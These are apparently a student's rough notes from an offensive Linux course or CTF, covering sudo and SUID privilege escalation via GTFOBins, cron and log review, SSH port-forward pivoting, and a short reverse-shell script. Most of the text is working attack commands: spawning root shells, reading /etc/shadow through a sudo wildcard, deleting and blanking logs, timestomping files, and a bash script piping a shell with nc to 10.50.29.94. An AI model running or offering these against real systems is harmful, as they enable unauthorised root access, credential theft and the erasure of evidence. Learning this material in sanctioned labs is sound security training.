GTFO BINS : https://gtfobins.github.io/
========================================================================================================
ssh ____@____
sudo -l
(will show user may be running following command) /../..
gtfo bins*
sudo apt-get changelog apt (ask what is the important part again)
(/tmp/apt-changelog) boom
CMD mode
!/bin/sh (gives u shell) # (root)
whoami, should be root
sudo -l
demo may run... root (NOPASSWD: /bin/cat /var/log/syslog*)
ls ^^^
(probably doing log rotation)
sudo cat /var/log/syslog /, , /etc/shadow (anything because of *)
*********important thing is sudo -l and then see what you can do from there**********
ls -la /etc/sudoers ... sudo cat /var/log/syslog /etc/sudoers
MUST BE EXACT**********^    x    ALL=(ALL:ALL) ALL      ^***********************
ls -la $(which passwd)
find / -type f perm /4000 -ls 2>/dev/null
find under root of file system, files with perms 4000, list them out, push any erros to dev null
2000, 6000, 4000, sguid

XXX sudo install -m =xs $(which nice) .
XXX ./nice /bin/sh -p
(run this) nice /bin/sh -p (because u dont need the other ones foo)
# ...... whatever u want my boy

crontab -guru
cat /etc/crontab
sunday = 0 or 7
crontab -e-l,-r,-u, 
m h dom mon dow
ls -la /etc/cron.X

find / -type d -perm /2 (write bit for others on) -ls 2>/dev/null

figure out init type
ls -latr /proc/1/exe
stat /sbin/init
man init
init --version
ps 1

cat /var/log/auth.log | egrep -v "opened|closed"
awk '/opened/' /var/log/auth.log
last OR lastb OR lastlog
strings OR dd            # for data files
more /var/log/syslog
head/tail

clearing logs
rm -rf /var/log/... (get rid of it)
cat /dev/null > /var/log/... (clear)
echo > /var/log/... (clear)

timestomp
touch -c -t 201603051015 1.txt   # Explicit
touch -r 3.txt 1.txt    # Reference

touch -c -t 201802061427 file.exe
stat file.exe
touch -r because of the .00000 
touch -r actualfile filemodifying.exe
stat filemodifying.exe

Newer Rsyslog references /etc/rsyslog.d/* for settings/rules
Older version only uses /etc/rsyslog.conf
<facility>.<priority>
kern.*                                                # All kernel messages, all severities
mail.crit
cron.!info,!debug                                                            # old format
*.* action(type="omfwd" target="192.168.10.254" port="514" protocol="udp")   # New format


//ctfd
student@lin-ops:~$ ssh -S /tmp/jump jump -O forward -L 1230:192.168.28.105:2222
student@lin-ops:~$ ssh comrade@127.0.0.1 -p 1230
student@lin-ops:~$ ssh -MS /tmp/pivot comrade@127.0.0.1 -p 1230
student@lin-ops:~$ ssh -S /tmp/pivot pivot -O forward -L 1233:192.168.28.27:22
student@lin-ops:~$ ssh comrade@127.0.0.1 -p 1233

make script in both /var/tmp and /tmp bc the cmd we working with (below) random
#!/bin/bash
nc -c /bin/bash 10.50.29.94 2345
what we working with::: cd `printf "/var/tmp\n/tmp\n"|sort -R | head -n 1`;ls
student@lin-ops:~$ nc -lvp 2345





